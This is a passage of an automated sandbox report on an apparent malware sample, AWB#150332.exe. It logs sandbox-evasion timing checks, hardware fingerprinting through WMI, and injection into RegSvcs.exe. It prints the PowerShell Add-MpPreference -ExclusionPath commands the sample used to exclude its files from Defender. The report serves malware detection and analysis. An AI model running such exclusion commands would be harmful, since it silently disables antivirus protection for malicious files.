                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe - Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match | File source: Process Memory Space: AWB#150332.exe PID: 5432, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration (repeated 2 times)
                    Source: C:\Users\user\Desktop\AWB#150332.exe | Memory allocated: 1800000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\AWB#150332.exe | Memory allocated: 3160000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\AWB#150332.exe | Memory allocated: 5160000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\AWB#150332.exe | Memory allocated: 9760000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\AWB#150332.exe | Memory allocated: A760000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\AWB#150332.exe | Memory allocated: A980000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\AWB#150332.exe | Memory allocated: B980000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Memory allocated: 2A60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Memory allocated: 2C00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Memory allocated: 4C00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Memory allocated: 8DA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Memory allocated: 9DA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Memory allocated: 9FA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Memory allocated: AFA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Memory allocated: 1440000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Memory allocated: 2F10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Memory allocated: 4F10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Memory allocated: 13D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Memory allocated: 2E60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Memory allocated: 4E60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_07305AA0 rdtsc 12_2_07305AA0
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_0730BD19 sldt word ptr [eax] 12_2_0730BD19
                    Source: C:\Users\user\Desktop\AWB#150332.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (repeated 4 times)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Thread delayed: delay time: 922337203685477 (repeated 2 times)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6330
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5952
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 4466
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 3904
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2582
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 7268
                    Source: C:\Users\user\Desktop\AWB#150332.exe TID: 3696 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7040 | Thread sleep count: 6330 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264 | Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6920 | Thread sleep count: 210 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7284 | Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe TID: 7500 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 1204 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 3696 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard (repeated 2 times)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Last function: Thread delayed (repeated 2 times)
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\AWB#150332.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (repeated 4 times)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99734
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99625
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99506
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99375
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99120
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98746
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98200
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97970
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97699
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97593
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97374
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97266
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97047
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96937
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96828
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96718
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96609
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96171
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96062
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95952
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95839
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95734
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95617
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95515
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95406
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95297
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95187
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 94969
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 94844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 94734
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99588
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99319
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99093
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98757
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98652
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98510
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98391
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98139
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98030
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97920
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97806
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97029
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96887
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96708
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96571
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95998
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95440
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95202
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95093
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 94984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 94875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 94765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 94656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 94547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 94431
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 94312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 93760
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 93641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 93530
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | Thread delayed: delay time: 922337203685477 (repeated 2 times)
                    Source: RegSvcs.exe, 00000009.00000002.1338206289.00000000061AC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.2479998218.0000000006260000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_07305AA0 rdtsc 12_2_07305AA0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (repeated 2 times)
                    Source: C:\Users\user\Desktop\AWB#150332.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
Source: C:\Users\user\Desktop\AWB#150332.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe"
Source: C:\Users\user\Desktop\AWB#150332.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe"
Source: C:\Users\user\Desktop\AWB#150332.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe"
Source: C:\Users\user\Desktop\AWB#150332.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe"
Source: C:\Users\user\Desktop\AWB#150332.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
